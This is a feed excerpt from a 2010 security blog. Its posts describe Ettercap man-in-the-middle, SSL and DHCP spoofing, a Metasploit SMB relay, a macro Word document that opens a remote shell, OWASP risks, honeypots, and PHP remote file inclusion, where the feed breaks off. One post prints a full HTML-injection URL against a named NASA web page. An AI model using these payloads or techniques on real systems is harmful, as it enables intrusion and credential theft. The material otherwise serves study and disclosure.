href='http://pinoysecurity.blogspot.com/2010/05/dns-spoofing-and-browser-spying-part-2.html' title='DNS Spoofing And Browser Spying Part 2'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-7413309446550682193</id><published>2010-04-30T12:05:00.001+08:00</published><updated>2010-05-05T16:54:38.641+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ettercap'/><title type='text'>DNS Spoofing And Browser Spying Part 1</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/o37rc97xdj8&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/o37rc97xdj8&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;This is the first video of three parts that explains various examples of sniffing using the Ettercap-NG tool, on BackTrack-4, in a Local Area Network scenario. This part explains OS Fingerprinting - Arp Poisoning and one example using Etterfilter.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-7413309446550682193?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/7413309446550682193/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/dns-spoofing-and-browser-spying-part-1.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/7413309446550682193'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/7413309446550682193'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/dns-spoofing-and-browser-spying-part-1.html' title='DNS Spoofing And Browser Spying Part 1'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3204812273765704745</id><published>2010-04-28T20:56:00.000+08:00</published><updated>2010-04-29T22:46:58.351+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Full Disclosure'/><title type='text'>HTML Injection in NASA Website</title><content type='html'>Last February 25, 2010 I made a full disclosure type of post here regarding multiple nasa.gov server "0-day" vulnerabilities. I believe most (if not all) of these live vulnerabilities have already been fixed thanks to the media like CBS News who broke it (together with the NSA defacement) to public in one of their "cyber war" reports involving the China Google hacking incident if my memory serves me right. Anyway, here is the last exploit which is a good example of html injection for those who are interested in studying it further.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;http://starbrite.jpl.nasa.gov/pds/viewDataset.jsp?dsid=error%3E%3Ciframe%20src=%22http://www.hackthissite.org%22%20%20height=%22300%22%20width=%22800%22%3E%3C/iframe%3E&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3204812273765704745?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3204812273765704745/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/html-injection-in-nasa-website.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3204812273765704745'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3204812273765704745'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/html-injection-in-nasa-website.html' title='HTML Injection in NASA Website'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8333496429028663841</id><published>2010-04-26T15:44:00.000+08:00</published><updated>2010-04-26T15:44:54.080+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ettercap'/><title type='text'>Sniffing SSL Secured Logins with Ettercap</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ESGV9zlo0Zo&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ESGV9zlo0Zo&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;A Small  video showing how easy it is to intercept HTTPS traffic  from &lt;span&gt;switched &lt;/span&gt;local network by spoofing the SSL certificate  using man in the middle attack with Ettercap. &lt;span&gt;The attacker uses one way ARP poisoning on  victim  and issues a fake spoofed SSL certificates on a switched Ethernet network.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8333496429028663841?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8333496429028663841/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/sniffing-ssl-secured-logins-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8333496429028663841'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8333496429028663841'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/sniffing-ssl-secured-logins-with.html' title='Sniffing SSL Secured Logins with Ettercap'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6622213638422173867</id><published>2010-04-23T17:57:00.000+08:00</published><updated>2010-04-23T17:58:04.972+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ettercap'/><title type='text'>DHCP Spoofing MITM Attack Using Ettercap</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/YJAglnMegMQ&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/YJAglnMegMQ&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;This video is showing how to spoof DHCP IP assignment using Ettercap. When a new PC is added on the network which is configured to have IP address dynamically from a DHCP address. An attcker can spoof this IP assignment process and provide his own IPs, like a gateway which has been configured to sniff their usernames and passwords.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6622213638422173867?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6622213638422173867/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/dhcp-spoofing-mitm-attack-using.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6622213638422173867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6622213638422173867'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/dhcp-spoofing-mitm-attack-using.html' title='DHCP Spoofing MITM Attack Using Ettercap'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1938035049031995162</id><published>2010-04-22T16:07:00.000+08:00</published><updated>2010-04-22T16:07:44.181+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wireless'/><title type='text'>Bluetooth sniffing in Linux</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/TPxw0V42p1o&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/TPxw0V42p1o&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;A very good video showing  how to sniff BlueTooth Pin while pairing two BlueTooth devices and then crack it.&amp;nbsp;&lt;span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1938035049031995162?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1938035049031995162/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/bluetooth-sniffing-in-linux.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1938035049031995162'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1938035049031995162'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/bluetooth-sniffing-in-linux.html' title='Bluetooth sniffing in Linux'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8544658455556712801</id><published>2010-04-20T16:05:00.002+08:00</published><updated>2010-04-20T16:07:27.695+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Application Security'/><title type='text'>Securing Web Applications</title><content type='html'>&lt;div id="__ss_522653" style="width: 425px;"&gt;&lt;object height="355" width="425"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=securing-web-services3494&amp;amp;stripped_title=securing-web-services" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=securing-web-services3494&amp;amp;stripped_title=securing-web-services" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;div style="padding: 5px 0pt 12px;"&gt;&lt;br /&gt;Securing Web Services - Presentation Transcript&lt;/div&gt;&lt;/div&gt;&lt;ol class="transcripts h-transcripts"&gt;&lt;li&gt;Securing Web Applications       Tara Kissoon, CISA, CISSP               Visa Inc.  &lt;/li&gt;&lt;li&gt;Objectives The participant will learn more about:  How to integrate OWASP Top 10 to mitigate  Web application security vulnerabilities.  &lt;/li&gt;&lt;li&gt;What is an application? An application: – Defined as user software – Is made up of a number of files, including configuration   files, executable programs and data files. – Is layered above an operating system and uses the   functionality of the operating system to deliver its   service. – The operating system provides a number of   mechanisms used for securing the application. – Contains security functionality that uses mechanisms   not residing within the operating system.&amp;nbsp;&amp;nbsp;&lt;/li&gt;&lt;li&gt;This presentation is on Web Services Security , pointing at almost all of the fields requires attention for web application security.Shows how to effectively manage application development lifecycle and how to integrate Top 10 OWASP projects to develop any application keeping security in mind.&lt;br /&gt;&lt;br /&gt;A1 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A1"&gt;Cross Site Scripting (XSS)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A2 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A2"&gt;Injection Flaws&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A3 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A3"&gt;Malicious File Execution&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A4 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A4"&gt;Insecure Direct Object Reference&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A5 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A5"&gt;Cross Site Request Forgery (CSRF)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A6 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A6"&gt;Information Leakage and Improper Error Handling&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A7 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A7"&gt;Broken Authentication and Session Management&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A8 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A8"&gt;Insecure Cryptographic Storage&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A9 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A9"&gt;Insecure Communications&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A10 - &lt;a href="http://www.owasp.org/index.php/Top_10_2007-A10"&gt;Failure to Restrict URL Access&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8544658455556712801?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8544658455556712801/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/securing-web-services-presentation.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8544658455556712801'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8544658455556712801'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/securing-web-services-presentation.html' title='Securing Web Applications'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-283421305661420365</id><published>2010-04-19T11:56:00.000+08:00</published><updated>2010-04-20T15:58:42.251+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Windows SMB Relay Exploit</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/-wrMF6RcfSo&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/-wrMF6RcfSo&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 Machine. He exploits a flaw in Windows Server Message Block (SMB) which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploits Framework to run the exploit. It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A live demonstration of obtaining admin access on a Windows XP SP3 Machine. Exploits a flaw in Windows Server Message Block (SMB) which provides shared access to files and folders on network. Hacker utilizes Metasploits Framework to run the exploit.It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer and can even get a reverse shell.Hacker forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter.For authentication target computer is forwarded to Metasploit.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-283421305661420365?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/283421305661420365/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/windows-smb-relay-exploit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/283421305661420365'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/283421305661420365'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/windows-smb-relay-exploit.html' title='Windows SMB Relay Exploit'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6041662083137591934</id><published>2010-04-18T00:28:00.000+08:00</published><updated>2010-04-20T15:59:24.590+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Remote Shell with a Word document</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/BcY4qWRkhF0&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/BcY4qWRkhF0&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Using a Metasploit payload on Backtrack 4 to create a macro enabled Microsoft Word document which upon execution opens up a remote shell.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6041662083137591934?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6041662083137591934/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/remote-shell-with-word-document.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6041662083137591934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6041662083137591934'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/remote-shell-with-word-document.html' title='Remote Shell with a Word document'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2516574410151201609</id><published>2010-04-16T18:38:00.001+08:00</published><updated>2010-04-16T18:42:54.876+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Honeypot'/><title type='text'>Honeypots</title><content type='html'>&lt;div id="__ss_931573" style="width: 425px;"&gt;&lt;object height="355" width="425"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=honeypot-1232384893195723-2&amp;amp;stripped_title=honey-pot-presentation" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=honeypot-1232384893195723-2&amp;amp;stripped_title=honey-pot-presentation" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;div style="padding: 5px 0pt 12px;"&gt;&lt;/div&gt;&lt;/div&gt;Honey Pot Systems are decoy servers or systems setup to gather information regarding an attacker or intruder into your system. It is important to remember that Honey Pots do not replace other traditional Internet security systems; they are an additional level or system. &lt;br /&gt;&lt;br /&gt;Honey Pots can be setup inside, outside or in the DMZ of a firewall design or even in all of the locations although they are most often deployed inside of a firewall for control purposes. In a sense, they are variants of standard Intruder Detection Systems (IDS) but with more of a focus on information gathering and deception. &lt;br /&gt;&lt;br /&gt;An example of a Honey Pot systems installed in a traditional Internet security design: &lt;br /&gt;&lt;div align="center"&gt;&lt;img alt="figure 1" height="288" src="http://www.sans.org/security-resources/idfaq/Image17.gif" width="480" /&gt; &lt;/div&gt;A Honey Pot system is setup to be easier prey for intruders than true production systems but with minor system modifications so that their activity can be logged of traced. The general thought is that once an intruder breaks into a system, they will come back for subsequent visits. During these subsequent visits, additional information can be gathered and additional attempts at file, security and system access on the Honey can be monitored and saved. &lt;br /&gt;&lt;br /&gt;Generally, there are two popular reasons or goals behind setting up a Honey Pot: &lt;br /&gt;&lt;ol&gt;&lt;li&gt;Learn how intruders probe and attempt to gain access to your systems. The general idea is that since a record of the intruder’s activities is kept, you can gain insight into attack methodologies to better protect your real production systems. &lt;/li&gt;&lt;li&gt;Gather forensic information required to aid in the apprehension or prosecution of intruders. This is the sort of information often needed to provide law enforcement officials with the details needed to prosecute. &lt;/li&gt;&lt;/ol&gt;The common line of thought in setting up Honey Pot systems is that it is acceptable to use lies or deception when dealing with intruders. What this means to you when setting up a Honey Pot is that certain goals have to be considered. &lt;br /&gt;&lt;br /&gt;Those goals are: &lt;br /&gt;&lt;ol&gt;&lt;li&gt;The Honey Pot system should appear as generic as possible. If you are deploying a Microsoft NT based system, it should appear to the potential intruder that the system has not been modified or they may disconnect before much information is collected. &lt;/li&gt;&lt;li&gt;You need to be careful in what traffic you allow the intruder to send back out to the Internet for you don’t want to become a launch point for attacks against other entities on the Internet. (One of the reasons for installing a Honey Pot inside of the firewall!) &lt;/li&gt;&lt;li&gt;You will want to make your Honey Pot an interesting site by placing "Dummy" information or make it appear as though the intruder has found an "Intranet" server, etc. Expect to spend some time making your Honey Pot appear legitimate so that intruders will spend enough time investigating and perusing the system so that you are able to gather as much forensic information as possible. &lt;/li&gt;&lt;/ol&gt;Some caveats exist that should be considered when implementing a Honey pot system. Some of the more important are:  &lt;br /&gt;&lt;br /&gt;The first caveat is the consideration that if the information gathered from a Honey Pot system is used for prosecution purposes, it may or may not be deemed admissible in court. While information regarding this issue is difficult to come by, having been hired as an expert witness for forensic data recovery purposes, I have serious reservations regarding whether or not all courts will accept this as evidence or if non-technical juries are able to understand the legitimacy of it as evidence. &lt;br /&gt;&lt;br /&gt;The second main caveat for consideration is whether hacking organizations will rally against an organization that has set "traps" and make them a public target for other hackers. Examples of this sort of activity can be found easily on any of the popular hacker’s sites or their publications.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2516574410151201609?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2516574410151201609/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/honeypot.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2516574410151201609'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2516574410151201609'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/honeypot.html' title='Honeypots'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6015153322106350667</id><published>2010-04-15T17:06:00.000+08:00</published><updated>2010-04-16T18:43:09.039+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RFI'/><title type='text'>PHP Remote File Inclusion</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/h8E07TnDCOI&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/h8E07TnDCOI&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Remote File Inclusion is a technique used to attack websites from a remote computer.RFI allow malicious users to run their own PHP code on a vulnerable website.This allows the attacker to use and run any remote file just by editing the URL. Like a webshell can display the files and folders on the server and can add,edit or delete files and folders,send spams and even get hold of root.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Remote File Inclusion&lt;/b&gt; (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Code execution on the web server&lt;/li&gt;&lt;li&gt;Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).&lt;/li&gt;&lt;li&gt;Denial of Service (DoS)&lt;/li&gt;&lt;li&gt;Data Theft/Manipulation&lt;/li&gt;&lt;/ul&gt;&lt;table class="toc" id="toc"&gt;&lt;tbody&gt;&lt;tr&gt; &lt;td&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;/td&gt; &lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;script type="text/javascript"&gt;//&lt;![CDATA[if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); } //]]&gt;&lt;/script&gt;   In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function, most notable are the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen directive and if enabled it allows filesystem functions to use a URL which allow them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this, all user input needs to be validated before being used.&lt;br /&gt;&lt;h4&gt;&lt;span class="editsection"&gt;&lt;/span&gt;&lt;span class="mw-headline" id="Example"&gt;Example&lt;/span&gt;&lt;/h4&gt;Consider this PHP script (which includes a file specified by request):&lt;br /&gt;&lt;div class="mw-geshi" dir="ltr" style="text-align: left;"&gt; &lt;div class="php source-php" style="font-family: monospace;"&gt; &lt;pre class="de1"&gt;&lt;span 